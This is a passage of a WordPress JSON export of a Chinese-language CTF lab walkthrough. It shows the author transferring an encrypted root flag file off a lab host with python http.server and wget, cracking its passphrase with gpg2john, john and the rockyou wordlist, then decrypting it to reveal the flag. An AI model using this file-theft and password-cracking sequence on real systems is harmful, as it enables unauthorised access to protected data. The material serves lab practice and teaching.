\u5c06\u52a0\u5bc6\u7684 root \u6587\u4ef6\u4e0b\u8f7d\u5230\u672c\u673a\uff1a<\/p>\n
python3 -m http.server 8888\nwget http:\/\/10.160.78.89:8888\/root.txt.gpg<\/code><\/pre>\n
\u5c1d\u8bd5\u4f7f\u7528john<\/code>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
gpg2john root.txt.gpg > flag_hash\nsudo gzip -d \/usr\/share\/wordlists\/rockyou.txt.gz\njohn flag_hash -w=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n
(virtualbox\u7684kali\u6ca1\u641e\u8fc7\u8fd9\u4e2a\u5b57\u5178\uff09<\/p>\n
\"image-20240322160453875\"<\/div><\/p>\n
\u7206\u7834\u51fa\u6765\u4e86\u5bc6\u7801\uff1a<\/p>\n
arthur<\/code><\/pre>\n
\u4f7f\u7528\u8fd9\u4e2a\u5bc6\u7801\u5bf9gpg<\/code>\u6587\u4ef6\u8fdb\u884c\u89e3\u5bc6\uff1a<\/p>\n
gpg root.txt.gpg<\/code><\/pre>\n
\"image-20240322160614051\"<\/div><\/p>\n
\u8f93\u5165\u5bc6\u7801\u8fdb\u884c\u89e3\u5bc6\uff1a<\/p>\n
\"image-20240322160650339\"<\/div><\/p>\n
\u83b7\u53d6\u5230\u4e86flag\uff01<\/p>\n
e16957fbc9202932b1dc7fe3e10a197e<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
aqua \u626b\u4e00\u4e0b\u770b\u770b\u80fd\u4e0d\u80fd\u626b\u5f97\u5230\uff1a \u770b\u6765\u662f\u53ef\u4ee5\u8fdb\u884c\u64cd\u4f5c\u7684\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -Pn 10.160 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,20,24,18],"tags":[],"class_list":["post-442","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-crypto","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/442","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=442"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/442\/revisions"}],"predecessor-version":[{"id":443,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/442\/revisions\/443"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=442"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}